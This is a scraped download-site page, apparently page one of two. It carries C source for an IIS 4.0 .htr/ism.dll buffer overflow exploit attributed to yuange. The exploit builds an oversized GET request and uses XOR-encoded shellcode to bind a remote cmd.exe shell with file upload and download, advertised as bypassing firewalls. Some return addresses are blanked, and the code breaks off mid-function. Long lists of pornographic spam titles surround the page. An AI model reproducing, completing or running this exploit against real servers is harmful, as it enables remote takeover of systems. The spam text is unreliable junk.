亚洲欧美第一页_禁久久精品乱码_粉嫩av一区二区三区免费野_久草精品视频

? 歡迎來(lái)到蟲蟲下載站! | ?? 資源下載 ?? 資源專輯 ?? 關(guān)于我們
? 蟲蟲下載站

?? windows下強(qiáng)大功能的溢出程序源代碼.txt

?? WINDOWS下強(qiáng)大功能的溢出程序源代碼
?? TXT
?? 第 1 頁(yè) / 共 2 頁(yè)
字號(hào):
windows下強(qiáng)大功能的溢出程序源代碼

--------------------------------------------------------------------------------

作者:袁哥 yuange@nsfocus.com
主頁(yè):http://www.nsfocus.com

/*----------------------------------------------------------*/
/*   IIS4.0的.htr映射ism.dll溢出攻擊程序                    */
/*   編寫:yuange(yuange@nsfocus.com)                       */
/*   本程序?qū)崿F(xiàn)所有語(yǔ)言版本W(wǎng)INDOWS下的溢出攻擊。            */
/*   SHELLCODE代碼實(shí)現(xiàn)綁定cmd.exe功能,實(shí)現(xiàn)上傳、           */
/*   下傳文件的ftp功能,實(shí)現(xiàn)加密傳輸功能,不開              */
/*   端口、不開服務(wù),可以繞過(guò)防火墻等。獨(dú)創(chuàng)的實(shí)             */
/*   現(xiàn)源代碼編寫shellcode的辦法,可以方便編寫、            */
/*   修改、調(diào)試shellcode,使得編寫強(qiáng)大功能的                */
/*   shellcode成為可能。也解決了溢出攻擊的幾個(gè)根            */
/*   本問(wèn)題:1、溢出點(diǎn)確定;2、shellcode定位;              */
/*   3、jmp esp功能代碼地址確定;4、WINDOWS的API            */
/*   調(diào)用地址版本相關(guān)問(wèn)題。另一個(gè)版本實(shí)現(xiàn)了接管             */
/*   WWW功能,可以實(shí)現(xiàn)不修改WEB頁(yè)面文件的情況下替           */ 
/*   換所有WEB頁(yè)面。                                        */
/*   一般的溢出攻擊程序也可以使用這個(gè)框架                   */
/*                                                          */
/*   程序在vc6.0下編譯通過(guò)                                  */
/*----------------------------------------------------------*/

/* 
     iis4。0  overflow program ver 1.0
     copy by yuange <yuange@163.net>  2000。05。8
*/   

#include <windows.h> 
#include <winsock.h>
#include <stdio.h>
#include <httpext.h>

#define  FNENDLONG   0x08
#define  NOPCODE     'B'    // INC EDX    0x90
#define  NOPLONG     0x50
#define  BUFFSIZE    0x20000
#define  PATHLONG    0x12
// c:\inetpub\wwwroot    物理路徑長(zhǎng)度。
// 因?yàn)閃WW處理GET /的時(shí)候前面要加物理路徑,再傳遞給ISM.DLL處理,所以溢出點(diǎn)與物理路徑有
// 關(guān)。可以先用.IDC,.ida,.idq泄露物理路徑的辦法得到物理路徑長(zhǎng)度

#define  RETEIPADDRESS 0xxxxx-PATHLONG+4+4
#define  ADD1          0xxxx-0xxxxx-PATHLONG+4
#define  ADD2      0xxxxx-0xxxxx-PATHLONG+4
/* 由于一些原因,這兒數(shù)據(jù)不提供  2000.10.25 */

// 兩個(gè)要處理的參數(shù)地址,參見后面ISM.DLL有問(wèn)題代碼的注釋

#define  SHELLBUFFSIZE 0x800 
#define  SHELLFNNUMS   12
#define  DATAXORCODE   0xAA
#define  LOCKBIGNUM    19999999
#define  LOCKBIGNUM2   13579139
#define  WEBPORT       80  

void     shellcodefnlock();
void     shellcodefn(char *ecb);
void     cleanchkesp(char *fnadd,char *shellbuff,char *chkespadd ,int len);
void     iisput(int fd,char *str);
void     iisget(int fd,char *str);
int      newrecv(int fd,char *buff,int size,int flag);
int      newsend(int fd,char *buff,int size,int flag);

int      xordatabegin;
int      lockintvar1,lockintvar2;
char     lockcharvar;


int main(int argc, char **argv)
{ 
  char *server;
  char *str="LoadLibraryA""\x0""CreatePipe""\x0"
       "CreateProcessA""\x0""CloseHandle""\x0"
       "PeekNamedPipe""\x0"
       "ReadFile""\x0""WriteFile""\x0"
       "CreateFileA""\x0"
       "GetFileSize""\x0"
       "GetLastError""\x0"
       "Sleep""\x0"
       "cmd.exe""\x0""\x0d\x0a""exit""\x0d\x0a""\x0"
       "XORDATA""\x0"
       "strend";
  char buff1[]="GET /""\xff""default.htr/";
  char buff2[]=".HTR HTTP/1.1 \nHOST:";
  char *fnendstr="\x90\x90\x90\x90\x90\x90\x90\x90\x90";
  char SRLF[]="\x0d\x0a\x00\x00";  

  char eipexcept1[] ="\xxx\xxx\xxx\xxx";
// char eipexcept[] ="\xxx\xxx\xxx\xxx"; 
// ret
  char  eipexcept[]="\xxx\xxx\xxx\xxx"; 
  char  eipwinnt[] ="\xxx\xxx\xxx\xxx";
  char  eipwinnt2[]="\xxx\xxx\xxx\xxx";
  char  reteax[]   ="\xxx\xxx\xxx\xxx";

/* 由于一些原因,這兒數(shù)據(jù)不提供  2000.10.25 */

  char  eipjmpshell[]="\x90\x90\x90\x90\xff\x63\x64";
  

  char    buff[BUFFSIZE];
  char    recvbuff[BUFFSIZE];
  char    shellcodebuff[0x1000];
  struct  sockaddr_in s_in2,s_in3;
  struct  hostent *he;
  char    *shellcodefnadd,*chkespadd;
  unsigned  int sendpacketlong;

  int       i,j,k;
  unsigned  char temp;
  int       fd;
  u_short   port,port1,shellcodeport;
  SOCKET    d_ip;
  WSADATA   wsaData;
  int       offset=0;
  int       OVERADD=RETEIPADDRESS;
  int       result;

  fprintf(stderr,"\n IIS4.0 OVERFLOW PROGRAM 2.0 .");
  fprintf(stderr,"\n copy by yuange(yuange@nsfocus.com) 2000.6.2.");
  fprintf(stderr,"\n welcome to my homepage http://yuange.yeah.net .");
  fprintf(stderr,"\n welcome to http://www.nsfocus.com .");
  fprintf(stderr,"\n usage: %s <server> [offset] [webport] \n", argv[0]);

  if(argc <2){
      fprintf(stderr,"\n please enter the web server:");
      gets(recvbuff);
      for(i=0;i<strlen(recvbuff);++i){
         if(recvbuff[i]!=' ') break;
      }

      server=recvbuff;
      if(i<strlen(recvbuff)) server+=i;

      fprintf(stderr,"\n please enter the offset(0-3):");
      gets(buff);
      for(i=0;i<strlen(buff);++i){
      if(buff[i]!=' ') break;
      }
      offset=atoi(buff+i);       
  }


  result= WSAStartup(MAKEWORD(1, 1), &wsaData);
  if (result != 0) {
        fprintf(stderr, "Your computer was not connected "
        "to the Internet at the time that "
        "this program was launched, or you "
        "do not have a 32-bit "
        "connection to the Internet.");
        exit(1);
  }

  if(argc>2){
     offset=atoi(argv[2]);
  }
  OVERADD+=offset;

/*
  if(offset<0||offset>3){
     fprintf(stderr,"\n offset error !offset  0 - 3 .");
     gets(buff);
     exit(1);
  }

*/


  if(argc <2){
  //     WSACleanup( );    
  //       exit(1);
  }
  else  server = argv[1];

  for(i=0;i<strlen(server);++i){
     if(server[i]!=' ')
     break;
  }
  if(i<strlen(server)) server+=i;

  for(i=0;i+3<strlen(server);++i){
      if(server[i]==':'){
          if(server[i+1]=='\\'||server[i+1]=='/'){
              if(server[i+2]=='\\'||server[i+2]=='/'){
              server+=i;
              server+=3;
                  break;
              }
          }
      }
  }
  for(i=1;i<=strlen(server);++i){
      if(server[i-1]=='\\'||server[i-1]=='/') server[i-1]=0;
  }

  d_ip = inet_addr(server);
  if(d_ip==-1){
     he = gethostbyname(server);
     if(!he)
     {
           WSACleanup( );
       printf("\n Can't get the ip of %s !\n",server);
       gets(buff);
           exit(1);     
      }
      else    memcpy(&d_ip, he->h_addr, 4);
  }     
  
  if(argc>3) port=atoi(argv[3]);
  else   port=WEBPORT;
  if(port==0) port=WEBPORT;

  fd = socket(AF_INET, SOCK_STREAM,0);
  i=8000;
  setsockopt(fd,SOL_SOCKET,SO_RCVTIMEO,(const char *) &i,sizeof(i));
         
  s_in3.sin_family = AF_INET;
  s_in3.sin_port = htons(port);
  s_in3.sin_addr.s_addr = d_ip;
  printf("\n nuke ip: %s port %d",inet_ntoa(s_in3.sin_addr),htons(s_in3.sin_port));
  
  if(connect(fd, (struct sockaddr *)&s_in3, sizeof(struct sockaddr_in))!=0)  {        
     closesocket(fd);
     WSACleanup( );
     fprintf(stderr,"\n  connect err.");
     gets(buff);
     exit(1);
}
  
  _asm{
     mov ESI,ESP
     cmp ESI,ESP
  }
  _chkesp();
  chkespadd=_chkesp;
  temp=*chkespadd;
  if(temp==0xe9) {
         ++chkespadd;
            i=*(int*)chkespadd;
         chkespadd+=i;
         chkespadd+=4;
  }

  shellcodefnadd=shellcodefnlock;
  temp=*shellcodefnadd;
  if(temp==0xe9) {
         ++shellcodefnadd;
         k=*(int *)shellcodefnadd;
             shellcodefnadd+=k;
         shellcodefnadd+=4;
  }

  for(k=0;k<=0x500;++k){
         if(memcmp(shellcodefnadd+k,fnendstr,FNENDLONG)==0) break;
  }
  memset(buff,NOPCODE,BUFFSIZE);
  if(argc>4){
    memcpy(buff,argv[4],strlen(argv[4]));
  }
  else  memcpy(buff,buff1,strlen(buff1));
  
  memcpy(buff+OVERADD+NOPLONG,shellcodefnadd+k+4,0x80);
     
  shellcodefnadd=shellcodefn;
  temp=*shellcodefnadd;
  if(temp==0xe9) {
     ++shellcodefnadd;
     k=*(int *)shellcodefnadd;
         shellcodefnadd+=k;
     shellcodefnadd+=4;
  }
  

  for(k=0;k<=0x1000;++k){
     if(memcmp(shellcodefnadd+k,fnendstr,FNENDLONG)==0) break;
  }

  memcpy(shellcodebuff,shellcodefnadd,k); 
  cleanchkesp(shellcodefnadd,shellcodebuff,chkespadd,k);
  for(i=0;i<0x400;++i){ 
          if(memcmp(str+i,"strend",6)==0) break;
  }     
  memcpy(shellcodebuff+k,str,i);


  sendpacketlong=k+i;
  for(k=0;k<=0x200;++k){
     if(memcmp(buff+OVERADD+NOPLONG+k,fnendstr,FNENDLONG)==0) break;
  }

  
  
  for(i=0;i<sendpacketlong;++i){
     temp=shellcodebuff[i];
     temp^=DATAXORCODE;
     if(temp<=0x10||temp==' '||temp=='.'||temp=='/'||temp=='\\'||temp=='0'||temp=='?'||temp=='%'){
             buff[OVERADD+NOPLONG+k]='0';
         ++k;
        temp+=0x40;
     }
     buff[OVERADD+NOPLONG+k]=temp;
     ++k;
}


//  memcpy(buff+OVERADD+NOPLONG+k,shellcodebuff,sendpacketlong);
//  k+=sendpacketlong;


   for(i=-0x30;i<0x30;i+=4){
        memcpy(buff+ADD1+offset+i,eipexcept,4);
        memcpy(buff+ADD2+offset+i,eipexcept,4);
   }

   for(i=-0x30;i<0x30;i+=4){
        memcpy(buff+OVERADD+i,eipexcept,4);
   }
   memcpy(buff+OVERADD+i,eipwinnt2,4);
   memcpy(buff+OVERADD+i+4,reteax,4);
   memcpy(buff+OVERADD+i+8,eipwinnt,4);
   memcpy(buff+OVERADD+i+0x0c,eipwinnt,4);
   memcpy(buff+OVERADD+i+0x10,eipjmpshell,7);

// fprintf(stderr,"\n send:\n %s",buff);
   fprintf(stderr,"\n offset:%d",offset);
/*

  if(argc>2){
      server=argv[2];
      if(strcmp(server,"win9x")==0){
          memcpy(buff+OVERADD,eipwin9x,4);
          fprintf(stderr,"\n nuke win9x.");
      }
      if(strcmp(server,"winnt")==0){
          memcpy(buff+OVERADD,eipwinnt,4);
          fprintf(stderr,"\n nuke winnt.");
      }
      
  }

*/

sendpacketlong=k+OVERADD+NOPLONG;
strcpy(buff+sendpacketlong,buff2);
strcpy(buff+sendpacketlong+strlen(buff2),server);
strcpy(buff+sendpacketlong+strlen(buff2)+strlen(server),"\n\n");
// printf("\n send buff:\n%s",buff);
//  strcpy(buff+OVERADD+NOPLONG,shellcode);
  sendpacketlong=strlen(buff);

/*
#ifdef DEBUG
  _asm{
      lea esp,buff
        add esp,OVERADD
      ret

  }
#endif

*/
  if(argc>6){
    if(strcmp(argv[6],"debug")==0){
           _asm{
             lea esp,buff
             add esp,OVERADD
             ret
        }
        }
  }



  xordatabegin=0;
  for(i=0;i<1;++i){ 
     j=sendpacketlong;
     fprintf(stderr,"\n send  packet %d bytes.",j);
         send(fd,buff,j,0);
     k=newrecv(fd,recvbuff,0x1000,0);
         if(k>=8&&memcmp(recvbuff,"XORDATA",8)==0) {
          xordatabegin=1;
              k=-1;
          fprintf(stderr,"\n ok!\n");
     }
     if(k>0){
          recvbuff[k]=0;
            fprintf(stderr,"\n  recv:\n %s",recvbuff);
     }

  }

  k=1;
  ioctlsocket(fd, FIONBIO, &k);

// fprintf(stderr,"\n now begin: \n");

  lockintvar1=LOCKBIGNUM2%LOCKBIGNUM;
  lockintvar2=lockintvar1;

  k=1;
  while(k!=0){
      if(k<0){
          i=0;
      while(i==0){
          gets(buff);
              if(memcmp(buff,"iisput",6)==0){
                  iisput(fd,buff+6);
              }
              else{
                  if(memcmp(buff,"iisget",6)==0){
                      iisget(fd,buff+6);
          }
          else i=1;
        }
         }
         k=strlen(buff);    
         memcpy(buff+k,SRLF,3);
         newsend(fd,buff,k+2,0);

     }
     k=newrecv(fd,buff,0x1000,0);
     if(xordatabegin==0&&k>=8&&memcmp(buff,"XORDATA",8)==0){
       xordatabegin=1;
           k=-1;
     }

     if(k>0){
      buff[k]=0;
      fprintf(stderr,"%s",buff);
     }
//   if(k==0) break;
  }  
  closesocket(fd);
  WSACleanup( );
  fprintf(stderr,"\n the server close connect.");
  gets(buff);
  return(0);
}


void  shellcodefnlock()
{
       _asm{
              nop
              nop
              nop
              nop
          nop
          nop
          nop
          nop

          _emit('?')
              
          xor ecx,ecx
          add si,474h
          cmp dword ptr [esi],ecx
          jnz getesi
          add si,4
getesi:          mov esi,[esi]
          add si,8
          xor ecx,ecx
          mov byte ptr [esi],cl


                  jmp   next
getediadd:      pop   EDI
          push  EDI
          pop   ESI
          push  ebx   //  ecb
          push  ebx   //  call shellcodefn ret address
          xor   ecx,ecx
looplock:         lodsb
          cmp  al,cl
          jz   shell
          cmp  al,0x30
          jz   clean0
sto:              xor  al,DATAXORCODE
          stosb
          jmp  looplock
clean0:           lodsb
          sub al,0x40
          jmp sto
next:             call  getediadd
shell:           NOP
          NOP
          NOP
          NOP
          NOP
          NOP
          NOP
          NOP
              
    }
}         

void shellcodefn(char *ecb)
{
    char        Buff[SHELLBUFFSIZE+2];
    int         *except[3];

    FARPROC     Sleepadd;
    FARPROC     GetLastErroradd;
    FARPROC     GetFileSizeadd;    
    FARPROC     CreateFileAadd;
    FARPROC     WriteFileadd;

?? 快捷鍵說(shuō)明

復(fù)制代碼 Ctrl + C
搜索代碼 Ctrl + F
全屏模式 F11
切換主題 Ctrl + Shift + D
顯示快捷鍵 ?
增大字號(hào) Ctrl + =
減小字號(hào) Ctrl + -
亚洲欧美第一页_禁久久精品乱码_粉嫩av一区二区三区免费野_久草精品视频
日本亚洲天堂网| 激情另类小说区图片区视频区| 中文字幕第一区第二区| 国产精品久久久久桃色tv| 亚洲资源中文字幕| 国产真实乱偷精品视频免| 国产乱淫av一区二区三区| 成人的网站免费观看| 91麻豆精品国产91久久久久久 | 国产成人福利片| 成人永久aaa| 日韩免费电影一区| 亚洲免费成人av| 久久99久久99| 色综合天天综合网天天狠天天 | 国产精品视频一区二区三区不卡| 亚洲制服欧美中文字幕中文字幕| 美国毛片一区二区| 色婷婷久久综合| 久久久久青草大香线综合精品| 一区二区三区成人在线视频| 国产一区不卡视频| 色一区在线观看| 欧美国产精品中文字幕| 日韩国产在线观看| 91福利在线导航| 国产精品美女久久久久av爽李琼| 石原莉奈在线亚洲二区| 91麻豆自制传媒国产之光| 91精品在线观看入口| 亚洲精品视频一区二区| 国产98色在线|日韩| 精品国产乱码久久久久久久久| 亚洲一区日韩精品中文字幕| 99久久久国产精品免费蜜臀| 欧美成人三级在线| 奇米影视在线99精品| 91国产免费看| 亚洲一二三区在线观看| 国产一区二区成人久久免费影院| 欧美一区二区在线看| 性欧美疯狂xxxxbbbb| 高潮精品一区videoshd| 欧美精品一区二区久久婷婷| 日韩电影免费一区| 337p亚洲精品色噜噜噜| 亚洲福利国产精品| 欧美性高清videossexo| 亚洲免费av高清| 色综合一个色综合亚洲| 中文字幕欧美一区| 99精品视频在线播放观看| 欧美成人猛片aaaaaaa| 精品一区精品二区高清| 精品精品国产高清a毛片牛牛 | 成人午夜激情在线| 国产精品白丝在线| 欧洲一区在线观看| 免费在线看一区| 国产精品第13页| 精品视频免费看| 国产主播一区二区| 一区二区日韩av| 精品久久久久一区二区国产| 成人av先锋影音| 奇米亚洲午夜久久精品| 中文字幕不卡在线播放| 欧美日韩在线播放三区四区| 狠狠色丁香久久婷婷综| 亚洲一区二区三区激情| 26uuu欧美| 欧美色精品在线视频| 国产成人自拍高清视频在线免费播放| 亚洲欧洲性图库| 久久亚洲综合色| 欧美午夜电影网| 成人av动漫网站| 久久99精品国产麻豆婷婷洗澡| 国产精品视频观看| 日韩一区二区电影| 色嗨嗨av一区二区三区| 国产乱淫av一区二区三区| 日韩中文字幕91| 亚洲色图在线看| 国产亚洲欧美一区在线观看| 欧美精品一卡二卡| 色综合视频一区二区三区高清| 久久99精品视频| 视频一区视频二区中文字幕| 中文字幕视频一区二区三区久| 精品成人一区二区三区| 4438成人网| 欧美丝袜自拍制服另类| 成人高清视频免费观看| 国产在线精品一区在线观看麻豆| 亚洲成人av电影| 一区二区久久久久久| 成人免费视频在线观看| 国产亚洲欧美在线| 国产亚洲精品超碰| 精品久久久三级丝袜| 日韩一二在线观看| 91精品国产欧美一区二区成人| 日本大香伊一区二区三区| 99精品久久免费看蜜臀剧情介绍| 国产一区二区电影| 国产剧情一区在线| 久久se精品一区精品二区| 男人的j进女人的j一区| 日韩激情一二三区| 视频在线观看一区| 免费高清在线一区| 日韩电影免费一区| 久久精品国产一区二区三区免费看| 亚洲第一成人在线| 日韩国产欧美三级| 亚洲一区二区成人在线观看| 一区二区三区日韩精品| 亚洲激情中文1区| 亚洲美女区一区| 一区二区视频在线看| 一级精品视频在线观看宜春院 | 亚洲国产经典视频| 日韩毛片视频在线看| 亚洲一区二区成人在线观看| 日一区二区三区| 久久99精品久久久久婷婷| 国产综合久久久久久久久久久久| 国产激情一区二区三区| 成人av资源站| 欧美三级日本三级少妇99| 日韩一区国产二区欧美三区| 欧美精品一区二区三区视频 | 亚洲黄色免费网站| 午夜视频一区二区三区| 另类小说欧美激情| 高清在线观看日韩| 日本久久精品电影| 日韩一级黄色大片| 国产日韩精品一区| 亚洲国产欧美另类丝袜| 精品亚洲成av人在线观看| 成人午夜免费电影| 欧美日韩的一区二区| 精品少妇一区二区三区在线视频| 亚洲国产成人午夜在线一区| 亚洲一区二区综合| 国产乱人伦精品一区二区在线观看| www.日韩在线| 在线播放欧美女士性生活| 久久―日本道色综合久久| 亚洲色图一区二区三区| 老色鬼精品视频在线观看播放| 福利一区二区在线观看| 精品婷婷伊人一区三区三| 国产色综合一区| 亚洲1区2区3区视频| 国产91在线看| 欧美一区二区三区四区视频| 国产精品婷婷午夜在线观看| 日韩成人免费看| 91丨porny丨中文| 亚洲精品一区二区三区影院 | 蜜桃av噜噜一区| 91欧美一区二区| 久久久久久久久久久久久夜| 亚洲午夜国产一区99re久久| 国产白丝网站精品污在线入口| 欧美亚洲国产一区二区三区 | 日韩美女一区二区三区四区| 国产精品国产三级国产a| 久久99国产精品成人| 欧美亚洲另类激情小说| 国产精品久久毛片av大全日韩| 美国精品在线观看| 91麻豆精品国产91久久久资源速度 | 91麻豆免费观看| 国产午夜精品一区二区三区嫩草| 亚洲五码中文字幕| 99re成人精品视频| 中文字幕不卡的av| 国产制服丝袜一区| 欧美xxxxx裸体时装秀| 日本最新不卡在线| 色婷婷久久综合| 伊人婷婷欧美激情| 成人a区在线观看| 国产情人综合久久777777| 日本在线观看不卡视频| 欧美日本一区二区三区| 一区二区三区四区高清精品免费观看| 国产成人亚洲综合a∨婷婷图片| 欧美第一区第二区| 蜜臀精品一区二区三区在线观看| 欧美性极品少妇| 午夜视频久久久久久| 制服丝袜亚洲精品中文字幕| 午夜电影一区二区| 91精品国产高清一区二区三区 | 91精品欧美一区二区三区综合在 |